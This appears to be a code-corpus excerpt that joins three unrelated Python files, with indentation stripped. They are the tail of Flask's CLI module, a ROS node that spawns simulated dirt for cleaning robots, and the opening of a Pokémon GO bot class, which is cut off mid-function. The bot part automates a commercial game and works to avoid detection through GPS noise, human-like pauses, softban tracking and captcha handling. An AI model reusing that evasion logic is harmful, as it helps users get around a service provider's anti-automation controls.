# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ['FLASK_RUN_FROM_CLI'] = 'true'
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app,
set_debug_flag=self.set_debug_flag)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return super(FlaskGroup, self).main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path):].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile('.env') or os.path.isfile('.flaskenv'):
click.secho(
' * Tip: There are .env or .flaskenv files present.'
' Do "pip install python-dotenv" to use them.',
fg='yellow')
return
if path is not None:
return dotenv.load_dotenv(path)
new_dir = None
for name in ('.env', '.flaskenv'):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
return
if app_import_path is not None:
message = ' * Serving Flask app "{0}"'.format(app_import_path)
if not eager_loading:
message += ' (lazy loading)'
click.echo(message)
click.echo(' * Environment: {0}'.format(env))
if env == 'production':
click.secho(
' WARNING: Do not use the development server in a production'
' environment.', fg='red')
click.secho(' Use a production WSGI server instead.', dim=True)
if debug is not None:
click.echo(' * Debug mode: {0}'.format('on' if debug else 'off'))
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = 'path'
def __init__(self):
self.path_type = click.Path(
exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == 'adhoc':
try:
import OpenSSL
except ImportError:
raise click.BadParameter(
'Using ad-hoc certificates requires pyOpenSSL.',
ctx, param)
return value
obj = import_string(value, silent=True)
if sys.version_info < (2, 7, 9):
if obj:
return obj
else:
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get('cert')
is_adhoc = cert == 'adhoc'
if sys.version_info < (2, 7, 9):
is_context = cert and not isinstance(cert, (text_type, bytes))
else:
is_context = isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.',
ctx, param)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.',
ctx, param)
if not cert:
raise click.BadParameter(
'"--cert" must also be specified.',
ctx, param)
ctx.params['cert'] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter(
'Required when using "--cert".',
ctx, param)
return value
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--cert', type=CertParamType(),
help='Specify a certificate file to use HTTPS.')
@click.option('--key',
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key, expose_value=False,
help='The key file to use when specifying a certificate.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=True,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads, cert):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
if eager_loading is None:
eager_loading = not reload
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(host, port, app, use_reloader=reload, use_debugger=debugger,
threaded=with_threads, ssl_context=cert)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s [%s]\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.env,
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command('routes', short_help='Show the routes for the app.')
@click.option(
'--sort', '-s',
type=click.Choice(('endpoint', 'methods', 'rule', 'match')),
default='endpoint',
help=(
'Method to sort routes by. "match" is the order that Flask will match '
'routes when dispatching a request.'
)
)
@click.option(
'--all-methods',
is_flag=True,
help="Show HEAD and OPTIONS methods."
)
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo('No routes were registered.')
return
ignored_methods = set(() if all_methods else ('HEAD', 'OPTIONS'))
if sort in ('endpoint', 'rule'):
rules = sorted(rules, key=attrgetter(sort))
elif sort == 'methods':
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [
', '.join(sorted(rule.methods - ignored_methods)) for rule in rules
]
headers = ('Endpoint', 'Methods', 'Rule')
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = '{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}'.format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*('-' * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd='export' if os.name == 'posix' else 'set',
prefix='$ ' if os.name == 'posix' else '> '
))
def main(as_module=False):
args = sys.argv[1:]
if as_module:
this_module = 'flask'
if sys.version_info < (2, 7):
this_module += '.cli'
name = 'python -m ' + this_module
# Python rewrites "python -m flask" to the path to the file in argv.
# Restore the original command so that the reloader works.
sys.argv = ['-m', this_module] + args
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
DirtGenerator.py
|
#! /usr/bin/env python3
import random
import numpy
import copy
import threading
import math
from typing import List
import rospy
import rospkg
from nav_msgs.msg import OccupancyGrid
from gazebo_msgs.srv import DeleteModel, SpawnModel
from geometry_msgs.msg import Pose, Point, Quaternion, TransformStamped, Transform, Vector3
from std_msgs.msg import Header
from goal_manager_msgs.msg import GoalObject, GoalObjectList, DirtModel
from commons.OccupancyMap import OccupancyMap, Cell
# Node name
NODE_NAME = 'dirt_generator'
# Topics and services
# BASE_MAP_TOPIC = '/robot_0/map'
BASE_MAP_TOPIC = 'modified_occupancy_grid'
ACTIVE_TASKS_TOPIC = 'active_tasks'
NEW_DIRT_TOPIC = 'new_dirt'
NEW_DIRT_GOALOBJECT_TOPIC = 'new_dirt_goalObject' # same as new dirt topic but of type GoalObject
# Gazebo model params
DIRT_MODEL_NAME = "dirt_object_undetected.sdf"
DIRT_MODEL_PACKAGE = "dirt_generator"
# Sedd to be used during simulation
SEED = 120
# Limits on the world map, that is, where the robot cannot move
X_MIN_IN = -5.0
X_MAX_IN = 5.0
Y_MIN_IN = -5.0
Y_MAX_IN = 5.0
# Min and max values for random timers
TIME_MIN = 10
TIME_MAX = 10
# Min and max trust level, that is, amount of confidence about the dirt observation
TRUST_MIN = 100
TRUST_MAX = 100
# Debug control constant
DEBUG_ON = True
class DirtGenerator:
def __init__(self, seed, spawn_interval):
self.position_map: List[Point] = []
self.spawn_number: int = 1
self.robot_size: float = 0.105 * 2
self.dirt_pos_tolerance: float = 0.25
self.occupancy_map: OccupancyGrid
self.active_dirt_list: List[GoalObject] = list()
self.model_pub = None
self.goal_pub = None
self.scan_sub = None
self.active_tasks_sub = None
self.seed = seed
self.time_interval_min = spawn_interval
self.time_interval_max = spawn_interval
self.occupancy_map = None
self.__init_publishers()
self.__init_subscribers()
# Getting parameters from parameter server
self.false_positive = rospy.get_param('~false_positive', False)
if self.false_positive:
self.num_robots = rospy.get_param('~no_of_robots')
self.fpp_props = numpy.zeros(self.num_robots)
#TODO: What about 0 probability i.e. disabelling FP for one of them
# Assume robots labelled robot_0_.... withi increasing integers
for i in range(0,self.num_robots):
self.fpp_props[i] = rospy.get_param('~robot_%d_fpp'%i)
# convert probabilities into timers
fp_spawn_intervals = (1.0 - self.fpp_props) / self.fpp_props * spawn_interval
# Store all spawn intervals in this array. The order is ground truth, robot 0, robot 1, ...
self.spawn_intervals = numpy.zeros(self.num_robots + 1)
self.spawn_intervals[0] = spawn_interval
self.spawn_intervals[1:] = fp_spawn_intervals
rospy.loginfo(f"[{NODE_NAME}] node is ready - "
f"\n\tlistening for active goals on '{self.active_tasks_sub.resolved_name}"
f"\n\tpublishing new random dirt to '{self.model_pub.resolved_name}'")
def __init_subscribers(self):
self.active_tasks_sub = rospy.Subscriber(ACTIVE_TASKS_TOPIC,
GoalObjectList, self.__active_tasks_cb)
def __init_publishers(self):
self.model_pub = rospy.Publisher(NEW_DIRT_TOPIC, DirtModel, queue_size=100)
self.goal_pub = rospy.Publisher(NEW_DIRT_GOALOBJECT_TOPIC, GoalObject, queue_size=100)
def __active_tasks_cb(self, combined_list):
# Save the received list with all currently active dirt and goals (from topic all_current_dirt_and_goals)
self.active_dirt_list = list(combined_list.goal_list)
def __comparing_points(self, point1, point2) -> bool:
"""
Compares two Points and returns true if they are identical (same position with some tolerance)
"""
return (abs(point1.x - point2.x) <= self.dirt_pos_tolerance and abs(
point1.y - point2.y) <= self.dirt_pos_tolerance)
def __check_for_duplicates(self, point, fp_list) -> bool:
"""
Goes through the list with all currently active dirt positions and compare their positions with the given
position. Returns true if there is a duplicate position but false positive of different robot so can create new fp task here, false otherwise
"""
duplicate = False
other_fp_duplicate = False # flag = true if false positive of other robot occupies position
# Check all already published (active) dirt objects (stored and received from the goal_list)
if len(fp_list) == 1:
for dirt in list(self.active_dirt_list):
if self.__comparing_points(point, dirt.pose.position):
print('Checking for duplicates in the FP list, robot being tested:, FP of existing task in location:, coordinates of task:')
print(fp_list)
print(dirt.fp)
print(point)
if len(dirt.fp) == 0 or fp_list[0] in dirt.fp: # i.e. dirt is ground truth or already fp of that robot.
duplicate = True
return duplicate, other_fp_duplicate
else:
other_fp_duplicate = True
return duplicate, other_fp_duplicate
else:
# Ground Truth
for dirt in list(self.active_dirt_list):
if self.__comparing_points(point, dirt.pose.position):
duplicate = True
return duplicate, other_fp_duplicate
return duplicate, other_fp_duplicate
def __get_cell_index(self, x, y) -> int:
cell_x = int((x - self.occupancy_map.origin.x) / self.occupancy_map.resolution)
cell_y = int((y - self.occupancy_map.origin.y) / self.occupancy_map.resolution)
index = cell_x + cell_y * self.occupancy_map.width
return index
def __is_occupied(self, x, y) -> bool:
"""
Check if the cell at position (x, y) is occupied or not (with a static obstacle like a wall)
"""
cell = self.occupancy_map.world2costmap(self.occupancy_map.costmap2world(Cell(x, y)))
index = self.occupancy_map.to_costmap_index(cell)
return self.occupancy_map.grid[index] != 0
def __is_occupied_(self, x, y) -> bool:
index = self.__get_cell_index(x, y)
return self.occupancy_map.grid[index] != 0
def __has_occupied_neighbors(self, x, y) -> bool:
"""
Checks if the neighbor cells (mask: radius of robot size) of the cell at the given position (x,y) are occupied
Mask is probably larger than needed, but it is okay (safer)
"""
# Robot radius in cells (according to OccupancyGrid)
robot_radius = int(math.ceil((self.robot_size / 2) / self.occupancy_map.resolution))
center_index = self.__get_cell_index(x, y)
# Only check the cells in the square around the center with edge length of twice the robot_radius (the center
# cell can be ignored, that is why robot_radius-1)
for r in range(-(robot_radius - 1), (robot_radius - 1)):
# Is actually not needed because we assume that the robot is symmetrical (square circle)
for c in range(-(robot_radius - 1), (robot_radius - 1)):
# Now refine the initial square with transforming the mask to a circle (nearly)
if math.floor(math.sqrt(r ** 2 + c ** 2)) <= robot_radius:
current_index = center_index + c + r * self.occupancy_map.width
# if in this circle one of the cells is occupied (!=0), then the given cell is not possible (
# return true)
if self.occupancy_map.grid[current_index] != 0:
return True
# Only if all cells in the circle mask are free, then the given cell is possible as dirt center
return False
def __get_dirt_candidate_cells(self):
while True:
if self.occupancy_map:
# As soon as map and metadata is received (!=0.0), create a static list with all possible positions
x_min = self.occupancy_map.origin.x
y_min = self.occupancy_map.origin.y
x_max = x_min + self.occupancy_map.height * self.occupancy_map.resolution
y_max = y_min + self.occupancy_map.width * self.occupancy_map.resolution
x_step = y_step = self.occupancy_map.resolution
# Take always the center position of the grid cells
for x in numpy.arange(x_min + x_step/2, x_max - x_step/2, x_step):
# Take always the center position of the grid cells
for y in numpy.arange(y_min + y_step/2, y_max - y_step/2, y_step):
# Check if it is inside the movement area of the robots
if (X_MIN_IN <= x <= X_MAX_IN) and (Y_MIN_IN <= y <= Y_MAX_IN):
if not self.__is_occupied_(x, y):
self.position_map.append(Point(x=x, y=y, z=0.0))
break
# Sleep one second until self.position_map can be created (occupancy grid, etc. was received)
#rospy.sleep(1)
def __generate_point_based_on_prob(self, fp_list) -> Point:
"""
Generates a random point, based on probabilities (map/distribution)
Returns random point of type Point(x, y, z)
"""
# Use a standard distribution (provided by libs/extern formulas) In this case: Beta distribution
# with alpha=2 and beta=2 (near to normal/Gaussian): ATTENTION: the distribution is applied to a position
# list, which goes row by row through the map. That means the hot spot (in case of Gaussian) is not a perfect
# circle in the middle of the map, but the complete rows in the middle of the map (also their boundary cells)
# We tested it and the distribution is good for our purpose, but keep in mind: it is not a circle in the
# center!
# positions were new task can spawn is empty space (position_map) or
# if it is a false positive, where a false positive of another robot is located
# NOTE, self.position_map contains a list of all grid centres which are not a wall and where the robot is not currently positioned. It does not care if a grid is already occupied by a task.
#all_positions = copy.deepcopy(self.position_map)
#if len(fp_list) == 1: # fp_list should only be size 0 (ground truth) or 1 i.e. single fp
# for task in self.active_dirt_list:
# if len(task.fp) > 0:
# if fp_list[0] not in task.fp:
# all_positions.append(task.pose.position)
index = 0
possible = False
while not possible:
index = int(random.betavariate(2, 2) * len(self.position_map))
x = self.position_map[index].x
y = self.position_map[index].y
# Check for occupied neighbors and only add the position if also the neighboring cells are free (the
# robot needs some space the reach it), otherwise generate a new one and test it
if not self.__has_occupied_neighbors(x, y):
# If actual spawning of dirt is enabled, then it should also be checked while generating objects
# if another dirt object is already at this position (if so, the generation has to be repeated!)
duplicate, other_fp_duplicate = self.__check_for_duplicates(Point(x, y, 0.0), fp_list)
if not duplicate:
possible = True
else:
rospy.loginfo(
rospy.get_caller_id() + "\n\n\tGenerated dirt at (%f | %f) was refused due to already "
"active dirt at this position (duplicate). Generating next "
"one...\n" % (
x, y))
else:
rospy.loginfo(
rospy.get_caller_id() + "\n\n\tGenerated dirt at (%f | %f) was refused due to occupied neighbor "
"cells. Generating next one...\n" % (
x, y))
return self.position_map[index], other_fp_duplicate
def __spawn_dirt(self, dirt: GoalObject, fp_duplicate_flag):
"""
Spawns dirt object in the map at the position which was generated for the dirt delivered via the input
parameter of this function
fp_duplicate_flag = true if there is already a task/dirt spawned as a false positive from another robot.
"""
# Init service
rospy.wait_for_service("gazebo/spawn_sdf_model")
spawn_model = rospy.ServiceProxy("gazebo/spawn_sdf_model", SpawnModel)
name = "dirt_" + str(self.spawn_number)
rospack = rospkg.RosPack()
pkg_path = rospack.get_path(DIRT_MODEL_PACKAGE)
path = pkg_path + "/" + DIRT_MODEL_NAME
with open(path, "r") as data:
model = data.read()
robot = "" # can be left empty
pose = dirt.pose
frame = "" # empty or "world" or "map"
# save name of model combined with position for future deletion (transmit it to goal_list where this is
# executed)
new_dirt_model = DirtModel(header=Header(stamp=rospy.get_rostime(), frame_id="map"), name=name, pose=pose)
self.goal_pub.publish(dirt)
# Spawn it
if not fp_duplicate_flag:
self.model_pub.publish(new_dirt_model)
spawn_model(name, model, robot, pose, frame)
rospy.loginfo(rospy.get_caller_id() + "\n\n\tNew dirt was spawned\n")
self.spawn_number += 1
def generation_process(self):
"""
Creates a random dirt until the node is shut down
"""
# Sleep at the beginning because not everything is set up (nodes, topics)
rospy.sleep(1)
if not self.false_positive:
index = 0
while not rospy.is_shutdown():
# Create an (increasing) index, a random trust value and a random position for the new dirt
index += 1
trust_value = random.randint(TRUST_MIN, TRUST_MAX)
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
# Position/Point should already be in an empty (not occupied) cell, because it is only randomly searched
# on already free positions
# Combine everything in the new object
goal = GoalObject(index, pose, trust_value, []) # creates no false positives thus empty list
rospy.loginfo("\n\n\t(%d)Dirt/Goal generated: [ID: %d, (%f,%f),trust: %d]\n" % (self.seed,
goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value))
# Spawn the dirt (if it is enabled)
self.__spawn_dirt(goal, other_fp_duplicate)
# Sleep rest of the (random defined) time
# sleep_time = random.randint(TIME_MIN, TIME_MAX)
sleep_time = random.randint(self.time_interval_min, self.time_interval_max)
rospy.loginfo("\n\n\tDirt generation will sleep now for %d seconds.\n" % sleep_time)
rospy.sleep(sleep_time)
else:
# including false positive
next_spawn = copy.deepcopy(self.spawn_intervals)
index = 0
while not rospy.is_shutdown():
# timers that have run out and spawn task
spawn_ind = numpy.where(next_spawn == min(next_spawn))[0]
for ind in spawn_ind:
index += 1
# Combine everything in the new object
if ind == 0:
# create new task.
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
# Ground Truth
goal = GoalObject(index, pose, TRUST_MAX, [])
rospy.loginfo("\n\n\t(%d)Dirt/Goal (GT) generated: [ID: %d, (%f,%f),trust: %d]\n" % (self.seed, goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value))
else:
# create new task.
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([ind - 1])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
# False Positive of robot ind - 1
goal = GoalObject(index, pose, TRUST_MAX, [ind - 1])
rospy.loginfo("\n\n\t(%d)Dirt/Goal (FP) generated: [ID: %d, (%f,%f),trust: %d, robot: %d]\n" % (self.seed, goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value, ind - 1))
# Spawn the dirt (if it is enabled)
self.__spawn_dirt(goal, other_fp_duplicate)
# Sleep rest of the (random defined) time
sleep_time = min(next_spawn)
rospy.loginfo("\n\n\tDirt generation will sleep now for %d seconds.\n" % sleep_time)
rospy.sleep(sleep_time)
# update the clocks and reset the ones that have reached 0
next_spawn = next_spawn - min(next_spawn)
next_spawn[spawn_ind] = self.spawn_intervals[spawn_ind]
def dirt_generator(self):
r = rospy.Rate(1)
# while not rospy.is_shutdown():
rospy.loginfo(f"[{NODE_NAME}] \n\tWaiting for occupancy map.")
self.occupancy_map = OccupancyMap.from_message(rospy.wait_for_message(BASE_MAP_TOPIC, OccupancyGrid))
# self.dirt_pos_tolerance = self.occupancy_map.resolution
self.__get_dirt_candidate_cells()
# Seed can be set with a parameter
random.seed(self.seed)
# Start generating+spawning dirt
thread1 = threading.Thread(target=self.generation_process)
thread1.start()
rospy.spin()
if __name__ == '__main__':
rospy.init_node(NODE_NAME, anonymous=True, log_level=rospy.INFO)
seed_ = rospy.get_param(f'~seed', 100)
spawn_interval_ = rospy.get_param(f'~spawn_interval', 10)
dg = DirtGenerator(seed_, spawn_interval_)
dg.dirt_generator()
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
import shelve
import uuid
import urllib2
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
from s2sphere import Cell, CellId, LatLng
from . import cell_workers
from .base_task import BaseTask
from .plugin_loader import PluginLoader
from .api_wrapper import ApiWrapper
from .cell_workers.utils import distance
from .event_manager import EventManager
from .human_behaviour import sleep
from .item_list import Item
from .metrics import Metrics
from .sleep_schedule import SleepSchedule
from pokemongo_bot.event_handlers import SocketIoHandler, LoggingHandler, SocialHandler, CaptchaHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from .worker_result import WorkerResult
from .tree_config_builder import ConfigException
from .tree_config_builder import MismatchTaskApiVersion
from .tree_config_builder import TreeConfigBuilder
from .inventory import init_inventory, player
from sys import platform as _platform
from pgoapi.protos.pogoprotos.enums import badge_type_pb2
from pgoapi.exceptions import AuthException, NotLoggedInException, ServerSideRequestThrottlingException, ServerBusyOrOfflineException, NoPlayerPositionSetException, HashingOfflineException
from pgoapi.hash_server import HashServer
class FileIOException(Exception):
pass
class PokemonGoBot(object):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
@property
def inbox(self):
"""
Returns the inbox data as received from the API.
:return: The inbox data.
:rtype: dict
"""
return self._inbox
@property
def stardust(self):
dust = filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]
if 'amount' in dust:
return dust['amount']
else:
return 0
@stardust.setter
def stardust(self, value):
dust = filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]
if 'amount' in dust:
dust['amount'] = value
def __init__(self, db, config):
self.database = db
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
# @var Metrics
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.wake_location = None
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
self.hb_locked = False # lock hb on snip
# Inventory refresh limiting
self.inventory_refresh_threshold = 10
self.inventory_refresh_counter = 0
self.last_inventory_refresh = time.time()
# Catch on/off
self.catch_disabled = False
self.capture_locked = False # lock catching while moving to VIP pokemon
# Inform bot if there's a response
self.empty_response = False
client_id_file_path = os.path.join(_base_dir, 'data', 'mqtt_client_id')
saved_info = shelve.open(client_id_file_path)
key = 'client_id'.encode('utf-8')
if key in saved_info:
self.config.client_id = saved_info[key]
else:
self.config.client_id = str(uuid.uuid4())
saved_info[key] = self.config.client_id
saved_info.close()
def start(self, bot):
self._setup_event_system(bot)
self.sleep_schedule = SleepSchedule(self, self.config.sleep_schedule) if self.config.sleep_schedule else None
if self.sleep_schedule:
self.sleep_schedule.work()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self, bot):
handlers = []
color = self.config.logging and 'color' in self.config.logging and self.config.logging['color']
debug = self.config.debug
handlers.append(LoggingHandler(color, debug))
handlers.append(SocialHandler(self))
handlers.append(CaptchaHandler(self, self.config.solve_captcha))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
# @var EventManager
self.event_manager = EventManager(bot, self.config.walker_limit_output, *handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message: :
# self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('captcha')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('niantic_warning')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event('debug')
self.event_manager.register_event('refuse_to_sit')
self.event_manager.register_event('reset_destination')
self.event_manager.register_event('new_destination')
self.event_manager.register_event('moving_to_destination')
self.event_manager.register_event('arrived_at_destination')
self.event_manager.register_event('staying_at_destination')
self.event_manager.register_event('buddy_pokemon', parameters=('pokemon', 'iv', 'cp'))
self.event_manager.register_event('buddy_reward', parameters=('pokemon', 'family', 'candy_earned', 'candy'))
self.event_manager.register_event('buddy_walked', parameters=('pokemon', 'distance_walked', 'distance_needed'))
# ignore candy above threshold
self.event_manager.register_event(
'ignore_candy_above_thresold',
parameters=(
'name',
'amount',
'threshold'
)
)
self.event_manager.register_event('followpath_output_disabled')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('security_check')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# recycle stuff
self.event_manager.register_event(
'next_force_recycle',
parameters=(
'time'
)
)
self.event_manager.register_event('force_recycle')
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_hunter_target',
parameters=(
'target_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'target_type',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'target_type',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items', 'stop_kind', 'spin_amount_now'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
